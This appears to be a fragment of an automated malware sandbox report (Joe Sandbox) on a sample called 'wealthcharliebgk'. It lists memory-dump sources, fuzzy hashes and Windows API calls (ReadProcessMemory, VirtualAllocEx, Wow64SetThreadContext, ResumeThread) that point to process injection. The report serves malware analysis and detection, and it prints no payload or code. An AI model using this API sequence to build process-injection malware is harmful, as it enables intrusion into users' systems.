                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: e0ccd8b94a9b223e23ed8fb583f0135ab9c9a918ffbcfdb8222ea702537ebe7a
                                                                                                                                    • Instruction ID: 1b9b2d57fdfedebaf6fa51d4308dbf7b8f9761967ed6f36f30c97412fe7b2fd7
                                                                                                                                    • Opcode Fuzzy Hash: e0ccd8b94a9b223e23ed8fb583f0135ab9c9a918ffbcfdb8222ea702537ebe7a
                                                                                                                                    • Instruction Fuzzy Hash: 9A41CAB4D002589FCF00CFAAD880AEEFBB1BF49310F10942AE815B7250D335A959DF68

                                                                                                                                    APIs
                                                                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0048F8C2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1726664587-0
                                                                                                                                    • Opcode ID: ef86ae0326b43298197864b83fd15084e9b9d45259c9f27091173da78ad558aa
                                                                                                                                    • Instruction ID: ff1f8592d0da83da37f7d0b72faacca16a378ecf49bfbde6395d59c517be21a6
                                                                                                                                    • Opcode Fuzzy Hash: ef86ae0326b43298197864b83fd15084e9b9d45259c9f27091173da78ad558aa
                                                                                                                                    • Instruction Fuzzy Hash: 4B41BBB4D002589FCF10DFAAD884AEEFBB1BF49310F10942AE815B7240D734A945CF68

                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0048F632
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 6ef783ff62998bf9ae96e06c41c2d2efb84885a65cee42def71d1ec3afef3b90
                                                                                                                                    • Instruction ID: a81a93f6bbc48d425b1037c89cdc151736f352b9996bf6c5a3c1d7cdf1588e29
                                                                                                                                    • Opcode Fuzzy Hash: 6ef783ff62998bf9ae96e06c41c2d2efb84885a65cee42def71d1ec3afef3b90
                                                                                                                                    • Instruction Fuzzy Hash: 4241A9B4D002589FCF10CFA9D984AAEFBB1BF49310F20942AE815B7310D735A956CF69

                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0048F632
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 32fce27783b75f7aee52c8cd80e5b7d25f280a4576815cf0a8f3d926e1907306
                                                                                                                                    • Instruction ID: 723e7b9acf73ee3fee4dee90fa0b6d7344033f6ecf3b3ef5d698e76dfe3ee1a4
                                                                                                                                    • Opcode Fuzzy Hash: 32fce27783b75f7aee52c8cd80e5b7d25f280a4576815cf0a8f3d926e1907306
                                                                                                                                    • Instruction Fuzzy Hash: 314199B4D002589FCF10CFA9D984AAEFBB1BB49310F20942AE815B7314D735A956CF69
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0048F507
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 3379c3b6f3725745dd6078c2964131597f5dd4d5a9544af16645061c2fa02528
                                                                                                                                    • Instruction ID: b8b1bf6771869c77900f2519fef2d2609d1bc3ebd2ef03a8decf4df4e0453fed
                                                                                                                                    • Opcode Fuzzy Hash: 3379c3b6f3725745dd6078c2964131597f5dd4d5a9544af16645061c2fa02528
                                                                                                                                    • Instruction Fuzzy Hash: 5041BCB4D002589FCF10DFA9D884AEEFFB1AF49314F24842AE415B7244D7389949CF54
                                                                                                                                    APIs
                                                                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 0048F507
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ContextThreadWow64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 983334009-0
                                                                                                                                    • Opcode ID: 885196e415d6b4c8808f7174b032a6e8b50de54666e210b023f757bcdf5415da
                                                                                                                                    • Instruction ID: 663d101edfa2713fe745b3ddaec8a79edb6f7f0e6040214ee390d5dc3cfb436b
                                                                                                                                    • Opcode Fuzzy Hash: 885196e415d6b4c8808f7174b032a6e8b50de54666e210b023f757bcdf5415da
                                                                                                                                    • Instruction Fuzzy Hash: 2741ADB4D002589FCB10DFAAD884AEEFBB1AB49314F24842AE415B7344D738A949CF54
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0048F3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    • Opcode ID: 28ce80cc12eafcb800aeb63c3b7280e5e62e17e2e6943247ddc58e7efae1345f
                                                                                                                                    • Instruction ID: 7d226f8418068448a19a8478f6bc0edbfb3c980c5a4357c70c0e82a319aa014b
                                                                                                                                    • Opcode Fuzzy Hash: 28ce80cc12eafcb800aeb63c3b7280e5e62e17e2e6943247ddc58e7efae1345f
                                                                                                                                    • Instruction Fuzzy Hash: DF31BCB4D002189FCF10DFAAD984AEEFBB5AF49314F24942AE815B7300D735A905CF98
                                                                                                                                    APIs
                                                                                                                                    • ResumeThread.KERNELBASE(?), ref: 0048F3E6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ResumeThread
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 947044025-0
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371349713.00000000002FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 002FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_2fd000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                    • Instruction ID: 3e12b14665e46b6937580dea46818f6ca20e714211e0ac91c7db66d9ee0cb98b
                                                                                                                                    • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                                                                                    • Instruction Fuzzy Hash: BD11BB75904284DFDB02CF10C5C4B25FBA2FB84314F28C6AEDD494B256C33AD85ACBA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 316b6a508b37cf2c4b514206c65b80eaf3456008029342f8da5132e75fa688fa
                                                                                                                                    • Instruction ID: 5f1575693ca69a302fbf04dd9782e3d541a021a8c4f18155a50940f004d79b7f
                                                                                                                                    • Opcode Fuzzy Hash: 316b6a508b37cf2c4b514206c65b80eaf3456008029342f8da5132e75fa688fa
                                                                                                                                    • Instruction Fuzzy Hash: 67110A74C09349DFCB01DFA8D9942AEBFB4FF8A300F2095A6D805A7351D7741A11CB91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 80952547c36197f6ad260fca65df45102456f04a9242a7d4fe713520ef656675
                                                                                                                                    • Instruction ID: 030c876baa59a5ada27498f118fa16aa2260813e9cad61da6d73401a73903fb2
                                                                                                                                    • Opcode Fuzzy Hash: 80952547c36197f6ad260fca65df45102456f04a9242a7d4fe713520ef656675
                                                                                                                                    • Instruction Fuzzy Hash: 6B11A574D08209DFCF44DFA9D9855AEBBF5BB88304F2095AAC819A3314E7345A41DF91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 03873a4ea5c1b8668d15a9c53497c4363fc8eea98d21880e0d0af7def8be1b1d
                                                                                                                                    • Instruction ID: 52fbe127075c65d41c4bc6b4aa8b0ef88b6d6f8dc1a7b76177d813f897fc99a6
                                                                                                                                    • Opcode Fuzzy Hash: 03873a4ea5c1b8668d15a9c53497c4363fc8eea98d21880e0d0af7def8be1b1d
                                                                                                                                    • Instruction Fuzzy Hash: F011EE74908228CFDBA4CF64C984BE8B7B8BB49300F2858DAE40EA7291D7745EC5CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d54c7451b33c7e8b602a47677b0dfe55b1a95074586e33b86c9f50b20c0ae916
                                                                                                                                    • Instruction ID: 1934b652bc9b06d402ccbcec2ca97521ea7ef71ec6803a417878f526bb184f9e
                                                                                                                                    • Opcode Fuzzy Hash: d54c7451b33c7e8b602a47677b0dfe55b1a95074586e33b86c9f50b20c0ae916
                                                                                                                                    • Instruction Fuzzy Hash: CC013C70E096499FCB05DFB9D9505ADBBF4EF0A300F1496EAD818D7351E7358A01CB51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b1a2b48228495abbb8279a529224dd945efaf0fc321082e7e9a056e66c41f99d
                                                                                                                                    • Instruction ID: e08f52cb128327d60a2f7d29bdbe61049904af67c96e1b6aa52a6bff4c0e90cf
                                                                                                                                    • Opcode Fuzzy Hash: b1a2b48228495abbb8279a529224dd945efaf0fc321082e7e9a056e66c41f99d
                                                                                                                                    • Instruction Fuzzy Hash: 91012435804228CFCB24CF64C880BEDB7F8AB08301F6484D6D00EA3251C735AE86CF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bec1d0be5d7114ca23fc1452da5911e2c4bc1193f73d3daba9260fc5eb4dea07
                                                                                                                                    • Instruction ID: 63f35bc64293d1dfb858e3928e16c40a81e94145511b78ff060978502b4cff93
                                                                                                                                    • Opcode Fuzzy Hash: bec1d0be5d7114ca23fc1452da5911e2c4bc1193f73d3daba9260fc5eb4dea07
                                                                                                                                    • Instruction Fuzzy Hash: 84014B359082A4DFCF51CBA0CD946DCBBB5AF4A310F1840DAD489AB252C6355A86CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 878171cb54a4ed2d644e3080da0417d30ac586100c03848594f53f5ed31944c9
                                                                                                                                    • Instruction ID: 7a11ab7b8041bf3da2b56e8acde19a120d52ae2ce444ad2eb66e9c1e55d5f5b1
                                                                                                                                    • Opcode Fuzzy Hash: 878171cb54a4ed2d644e3080da0417d30ac586100c03848594f53f5ed31944c9
                                                                                                                                    • Instruction Fuzzy Hash: 6CF06D3090A344DFC712DF74E86456DBFB4EF8A300F1191EAC844A72A2D6341A04CB45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5a605a2b8130ee2b90477151b5f12759b00d4ab08fbf8170f2519d1979b62706
                                                                                                                                    • Instruction ID: 2369f9ef1b2b82a4fc800b9a4a0fe69b1e57bd45050a78d7684ae3d07aec2a0d
                                                                                                                                    • Opcode Fuzzy Hash: 5a605a2b8130ee2b90477151b5f12759b00d4ab08fbf8170f2519d1979b62706
                                                                                                                                    • Instruction Fuzzy Hash: 29F06230519615CFCB24DF60ECC8AAE7779FB8A306F50A95AC00A93265CF74AD45DF04
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c92d46bbbca3bbc6fb0d73be6eedb8adc96251e2c242157ef9c813966a2a8471
                                                                                                                                    • Instruction ID: 16ad4ee739509317c440e4d4a16eae364c940f7d7d126b36e7d100e2382578fc
                                                                                                                                    • Opcode Fuzzy Hash: c92d46bbbca3bbc6fb0d73be6eedb8adc96251e2c242157ef9c813966a2a8471
                                                                                                                                    • Instruction Fuzzy Hash: 80F0B774E046099FCB44EFB9D9945AEFBF9EB49300F1495AAC828E3344E7359A01CB40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 16a00a5a6180cf5a54faa9bb26ac98ae41ca2dc4ee139196f7f9c0599392f549
                                                                                                                                    • Instruction ID: 865188e822fe31a23bec973870a20a86c6df2d7f450f6d7d35e517da110836e4
                                                                                                                                    • Opcode Fuzzy Hash: 16a00a5a6180cf5a54faa9bb26ac98ae41ca2dc4ee139196f7f9c0599392f549
                                                                                                                                    • Instruction Fuzzy Hash: C6019D35A05268DFDB11CB94CC84FE9BBB5BB4D305F1881C8A509A7261C732AE81DF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c92f89570a9ec370aa2ae9dc8b1e5ad8dbadadeeae0bbaac32b7c6820d81f628
                                                                                                                                    • Instruction ID: c7050ddfe47ea99bae28acd243295c66bfb10363d30350ff5c3f7881be980cdc
                                                                                                                                    • Opcode Fuzzy Hash: c92f89570a9ec370aa2ae9dc8b1e5ad8dbadadeeae0bbaac32b7c6820d81f628
                                                                                                                                    • Instruction Fuzzy Hash: 64E01A3581C214CECB148F6194DC5FE7BBCBB8B356F663415D06AA20A1DB780184EB24
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aa40ab15626e2b6f229ce63bf812f2d80e5b9bf01574ac6c1e27b238b911f8be
                                                                                                                                    • Instruction ID: 7da92a0a6e6b19765f81008d6a195f0d71e17cda3f2f59460302ed551e3150e4
                                                                                                                                    • Opcode Fuzzy Hash: aa40ab15626e2b6f229ce63bf812f2d80e5b9bf01574ac6c1e27b238b911f8be
                                                                                                                                    • Instruction Fuzzy Hash: 8EF01C7990D3588FDB51CF64DC907ECBFB5AB4A310F2840DAD549AB292C2355A85DF00
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371656183.0000000000960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00960000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_960000_wealthcharliebgk.jbxd
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: |}/
                                                                                                                                    • API String ID: 0-2481615556
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7ebfd08a02d83a5bdea37aee291d97b9536a95de056876b79d04dc10d5975288
                                                                                                                                    • Instruction ID: 38fc181d3902352596a49a1d4c5832544d82fb39fcbfc0aeb5a759b4f14082d9
                                                                                                                                    • Opcode Fuzzy Hash: 7ebfd08a02d83a5bdea37aee291d97b9536a95de056876b79d04dc10d5975288
                                                                                                                                    • Instruction Fuzzy Hash: 60E12D74E001598FCB14EFA9C580AADFBB2FF89304F24856AD914AB356D734AD42CF61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cf6b3e2cefb2418bf06fb8b7c071cb30a29831a66bf3a0a74e598d25378249d5
                                                                                                                                    • Instruction ID: 9d37f26adc0d01548276f311671b45be8bf93b6258a1b3e3e92ef3859cc37bde
                                                                                                                                    • Opcode Fuzzy Hash: cf6b3e2cefb2418bf06fb8b7c071cb30a29831a66bf3a0a74e598d25378249d5
                                                                                                                                    • Instruction Fuzzy Hash: 49E10A74E001598FCB18DF99C5809AEFBB2FF89300F24856AD915AB356D734AD42CF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2e46cd571da218d5bec16e4449322ad17b2795ceb55d8bc7af9e30e34a3641b4
                                                                                                                                    • Instruction ID: ea7aeb3984964f77b912de7c00a0ff9529aee2cb187887260cdb1c920425111d
                                                                                                                                    • Opcode Fuzzy Hash: 2e46cd571da218d5bec16e4449322ad17b2795ceb55d8bc7af9e30e34a3641b4
                                                                                                                                    • Instruction Fuzzy Hash: 12E11974E006598FCB14DFA9C5809AEFBB2FF89304F24856AD815AB356D734AD42CF60
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d08fbe275bdb9e36b43091252fc9216d06a15f302f1c11057c56fdbaba6ac04
                                                                                                                                    • Instruction ID: d013f94f9d684ecd74676fe52674300516ea5acb3754f353ca30b7c0723a6dd1
                                                                                                                                    • Opcode Fuzzy Hash: 2d08fbe275bdb9e36b43091252fc9216d06a15f302f1c11057c56fdbaba6ac04
                                                                                                                                    • Instruction Fuzzy Hash: 19E11974E002598FCB14DFA9C5809AEFBB2FF89304F24856AD915AB356C734AD42CF61
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.371565089.0000000000480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00480000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_480000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6d44426788a40d6f4422f088b9ea0289095a3206e1ab92818d14e55deb5d487f
                                                                                                                                    • Instruction ID: a6d9c1cfa2f27ea808b74bb39607170e83c7cf3f5697d902c730303b207d1201
                                                                                                                                    • Opcode Fuzzy Hash: 6d44426788a40d6f4422f088b9ea0289095a3206e1ab92818d14e55deb5d487f
                                                                                                                                    • Instruction Fuzzy Hash: E3510B74E006198FCB18DFA9C5805AEFBF2FF89300F24856AD418AB356D7359942CFA5
                                                                                                                                    • Opcode Fuzzy Hash: c4036680e542519ae779b860f761e2d04f5b66c9fbd2b7b0517257afe7449c81
                                                                                                                                    • Instruction Fuzzy Hash: 7C43F431C10B5ACECB15EF68C884A99F7B1FF95300F55C69AE44967221EB70AAD4CF42
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: K
                                                                                                                                    • API String ID: 0-856455061
                                                                                                                                    • Opcode ID: def4b48594a94c19e8b46f0f95dca15b9ef07b66fb29636bf872a90814d45b66
                                                                                                                                    • Instruction ID: 418c31c8187c7fb9e1d36f3606f0c713cb2abfd8df0b85b8805c4a406cd03657
                                                                                                                                    • Opcode Fuzzy Hash: def4b48594a94c19e8b46f0f95dca15b9ef07b66fb29636bf872a90814d45b66
                                                                                                                                    • Instruction Fuzzy Hash: 7E33E435C1462A8EDB11EF68C884A9DF7B1FF99300F55C69AD44C67221EB70AAC5CF81
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875522413.0000000000240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00240000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_240000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: N
                                                                                                                                    • API String ID: 0-1130791706
                                                                                                                                    • Opcode ID: be3d2b9e499754d3d32bf934313bd5e60b48264b3f194155cc1b1ad5175c0830
                                                                                                                                    • Instruction ID: 12e08a9af39a2ca47c565af1bceb80c6abf6d4a7b36c46ea4bfa4a06cdde5017
                                                                                                                                    • Opcode Fuzzy Hash: be3d2b9e499754d3d32bf934313bd5e60b48264b3f194155cc1b1ad5175c0830
                                                                                                                                    • Instruction Fuzzy Hash: B182C331D1075A8ADB15EF68C8846EDF7B1FF99300F50C69AE44976221EB70AAD4CF42
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.875989849.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a20000_wealthcharliebgk.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: K
                                                                                                                                    • API String ID: 0-856455061
                                                                                                                                    • Opcode ID: 1ad9efea6afdc24ca65d10ae2a4bb84d59ba6ca544baad796b0926aa07524a8a
                                                                                                                                    • Instruction ID: 2f870aca2aafcf7002f4b2dd0a7a723729601a7171e8e672c3958d11b9fc4639
                                                                                                                                    • Opcode Fuzzy Hash: 1ad9efea6afdc24ca65d10ae2a4bb84d59ba6ca544baad796b0926aa07524a8a
                                                                                                                                    • Instruction Fuzzy Hash: 92B12471D046198FDB15DF69C8887DDBBB1FF99300F14C2AAD4086B261EB74AA85CF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000008.00000002.876003321.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_8_2_a50000_wealthcharliebgk.jbxd
